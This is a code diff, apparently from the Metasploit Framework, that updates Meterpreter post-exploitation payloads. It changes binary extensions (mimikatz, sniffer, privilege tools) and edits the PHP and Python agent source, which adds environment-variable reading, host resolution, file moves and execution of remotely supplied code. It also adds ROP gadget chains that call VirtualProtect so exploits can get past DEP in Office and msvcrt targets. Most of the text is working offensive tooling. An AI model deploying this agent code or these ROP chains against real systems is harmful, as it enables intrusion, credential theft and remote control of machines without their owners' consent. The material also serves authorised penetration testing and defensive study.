data/meterpreter/ext_server_lanattacks.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

43
data/meterpreter/ext_server_stdapi.php
View File

@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040); define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041); define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042); define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043);
define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044);
# Environment
define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100);
define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101);
define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0)); define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
} }
} }
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
$variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
# If we decide some day to have sys.config.getenv return all env
# vars when given an empty search list, this is one way to do it.
#if (empty($variable_tlvs)) {
# # We don't have a var to look up, return all of 'em
# $variables = array_keys($_SERVER);
#} else {
# $variables = array();
# foreach ($variable_tlvs as $tlv) {
# array_push($variables, $tlv['value']);
# }
#}
foreach ($variable_tlvs as $name) {
$canonical_name = str_replace(array("$","%"), "", $name['value']);
$env = getenv($canonical_name);
if ($env !== FALSE) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
}
}
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable # Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) { #if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self'); #register_command('stdapi_sys_config_rev2self');

118
data/meterpreter/ext_server_stdapi.py
View File

@ -149,8 +149,12 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket # Socket
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501 TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
@ -159,7 +163,9 @@ TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530 TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry # Registry
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
@ -170,15 +176,26 @@ TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012 TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013 TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config # Config
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040 TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041 TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042 TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043 TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0) DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process # Process
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
@ -273,6 +290,9 @@ ERROR_FAILURE = 1
# errors. # errors.
ERROR_CONNECTION_ERROR = 10000 ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path): def get_stat_buffer(path):
si = os.stat(path) si = os.stat(path)
rdev = 0 rdev = 0
@ -290,6 +310,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks) st_buf += struct.pack('<II', blksize, blocks)
return st_buf return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo(): def windll_GetNativeSystemInfo():
if not has_windll: if not has_windll:
return None return None
@ -341,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser()) response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = ''
env_var = env_var['value'].translate(None, '%$')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response): def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname() uname_info = platform.uname()
@ -580,20 +633,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_file_expand_path(request, response): def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if path_tlv == '%COMSPEC%': if has_windll:
if platform.system() == 'Windows': path_out = (ctypes.c_char * 4096)()
result = 'cmd.exe' path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
else: result = ''.join(path_out)[:path_out_len]
elif path_tlv == '%COMSPEC%':
result = '/bin/sh' result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows': elif path_tlv in ['%TEMP%', '%TMP%']:
result = '/tmp' result = '/tmp'
else: else:
result = os.getenv(path_tlv) result = os.getenv(path_tlv, path_tlv)
if not result: if not result:
return ERROR_FAILURE, response return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_FILE_PATH, result) response += tlv_pack(TLV_TYPE_FILE_PATH, result)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_move(request, response):
oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.rename(oldname, newname)
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_fs_getwd(request, response): def stdapi_fs_getwd(request, response):
response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd()) response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@ -622,7 +683,7 @@ def stdapi_fs_md5(request, response):
m = hashlib.md5() m = hashlib.md5()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
@ -669,7 +730,7 @@ def stdapi_fs_sha1(request, response):
m = hashlib.sha1() m = hashlib.sha1()
path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
m.update(open(path, 'rb').read()) m.update(open(path, 'rb').read())
response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest()) response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
@ -679,6 +740,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf) response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response): def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID) channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -834,9 +929,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ: if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD: elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4]) value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else: else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value]) response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
return ERROR_FAILURE, response return ERROR_FAILURE, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll Executable file
View File

Binary file not shown.

64
data/meterpreter/meterpreter.php
View File

@ -680,6 +680,30 @@ function tlv_pack($tlv) {
return $ret; return $ret;
} }
function tlv_unpack($raw_tlv) {
$tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
$type = $tlv['type'];
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", $raw_tlv);
$tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
function packet_add_tlv(&$pkt, $tlv) { function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv); $pkt .= tlv_pack($tlv);
} }
@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
# Start at offset 8 to skip past the packet header # Start at offset 8 to skip past the packet header
$offset = 8; $offset = 8;
while ($offset < strlen($pkt)) { while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8)); $tlv = tlv_unpack(substr($pkt, $offset));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}"); #my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) { if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset"); #my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv; return $tlv;
} }
$offset += $tlv['len']; $offset += $tlv['len'];
@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
} }
function packet_get_all_tlvs($pkt, $type) {
my_print("Looking for all tlvs of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
$all = array();
while ($offset < strlen($pkt)) {
$tlv = tlv_unpack(substr($pkt, $offset));
if ($tlv == NULL) {
break;
}
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
my_print("Found one at offset $offset");
array_push($all, $tlv);
}
$offset += $tlv['len'];
}
return $all;
}
## ##
# Functions for genericizing the stream/socket conundrum # Functions for genericizing the stream/socket conundrum
## ##

33
data/meterpreter/meterpreter.py
View File

@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0] offset += tlv[0]
return {} return {}
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def tlv_pack(*args): def tlv_pack(*args):
if len(args) == 2: if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]} tlv = {'type':args[0], 'value':args[1]}
@ -145,8 +163,9 @@ class STDProcessBuffer(threading.Thread):
self.data_lock.acquire() self.data_lock.acquire()
self.data += byte self.data += byte
self.data_lock.release() self.data_lock.release()
data = self.std.read()
self.data_lock.acquire() self.data_lock.acquire()
self.data += self.std.read() self.data += data
self.data_lock.release() self.data_lock.release()
def is_read_ready(self): def is_read_ready(self):
@ -208,7 +227,7 @@ class PythonMeterpreter(object):
def run(self): def run(self):
while self.running: while self.running:
if len(select.select([self.socket], [], [], 0)[0]): if len(select.select([self.socket], [], [], 0.5)[0]):
request = self.socket.recv(8) request = self.socket.recv(8)
if len(request) != 8: if len(request) != 8:
break break
@ -270,7 +289,7 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys() preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess}) i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec')) i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys() postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
@ -391,13 +410,17 @@ class PythonMeterpreter(object):
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv) resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions: handler_name = method_tlv['value']
handler = self.extension_functions[method_tlv['value']] if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try: try:
#print("[*] running method {0}".format(handler_name))
result, resp = handler(request, resp) result, resp = handler(request, resp)
except Exception, err: except Exception, err:
#print("[-] method {0} resulted in an error".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
else: else:
#print("[-] method {0} was requested but does not exist".format(handler_name))
result = ERROR_FAILURE result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result) resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp resp = struct.pack('>I', len(resp) + 4) + resp

BIN
data/meterpreter/metsrv.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll Executable file
View File

Binary file not shown.

66
data/ropdb/hxds.xml Normal file
View File

@ -0,0 +1,66 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>2007</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
<gadget offset="0x0008bfae">Writable location</gadget>
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
<gadget offset="0x0002c840">JMP [EAX]</gadget>
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>2010</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
<gadget offset="0x0008c638">Writable location</gadget>
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
<gadget offset="0x00073335">POP ESI # RETN</gadget>
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
<gadget offset="0x00076452">POP EAX # RETN</gadget>
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
</db>

2
data/ropdb/java.xml
View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget> <gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget> <gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget> <gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget> <gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget> <gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget> <gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget> <gadget value="0xffffffff"></gadget>

53
data/ropdb/msvcrt.xml
View File

@ -7,12 +7,21 @@
</compatibility> </compatibility>
<gadgets base="0x77c10000"> <gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget> <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget> <gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget> <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget> <gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget> <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility> </compatibility>
<gadgets base="0x77ba0000"> <gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget> <gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget> <gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget> <gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget> <gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget> <gadget offset="0x00029801">POP EBP # RETN</gadget>
